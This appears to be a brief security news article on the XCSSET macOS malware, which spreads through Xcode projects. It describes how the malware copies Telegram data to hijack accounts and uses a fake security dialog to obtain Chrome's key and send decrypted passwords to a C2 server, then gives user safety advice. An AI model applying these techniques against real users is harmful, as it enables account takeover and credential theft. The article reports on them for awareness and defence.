XCSSET, classified as an ongoing malware campaign by Trend Micro, is targeting MacOS users’ information by infecting Xcode projects. The most recent campaign has been spotted targeting Google Chrome and Telegram installations through Apple Scripts. A report by Trend Micro explains that because not all apps run in a sandboxed mode on MacOS, it’s possible for any user to read many of the installed application’s data directories. By copying the data from the Telegram installation to another system, it is possible to access the victim’s Telegram account. XCSSET also targets saved passwords in Google Chrome, though it isn’t quite as easy. Google Chrome protects saved credentials through a “safe_storage_key” which requires root permissions to read. To get around this, the malware author created a fake security dialog prompting the victim to grant it permission. Once the victim accepts, the passwords are then decrypted and sent to a command and control (C2) server.
Fortunately for most Mac users, a development environment such as Xcode is not a necessity and may not be installed. When looking for new applications, Mac users should stick to the App Store when possible. Like many storefronts, the App Store is curated and Apple vets applications through its own security screening process. Not all apps can be found on the App Store, however, so users should exercise caution when installing apps from third-party sources and only continue if they trust the site or source of the download. Developers using Xcode should also exercise caution when opening new projects from unfamiliar sources, as there could be untrusted code set to run during the build phase of the project.